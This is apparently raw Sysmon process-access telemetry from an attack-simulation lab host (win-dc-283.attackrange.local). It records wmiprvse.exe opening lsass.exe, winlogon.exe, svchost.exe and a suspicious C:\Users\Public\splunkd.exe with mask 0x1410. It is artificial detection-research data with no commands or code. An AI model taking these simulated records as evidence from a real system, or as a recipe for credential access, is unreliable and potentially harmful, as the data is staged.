15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025782Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025781Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025780Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025779Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025778Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025777Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025776Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025775Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025774Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025773Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025772Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025771Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025770Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025769Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025768Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025767Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025766Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025765Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025764Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5E06-00000000A301}7124C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025763Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 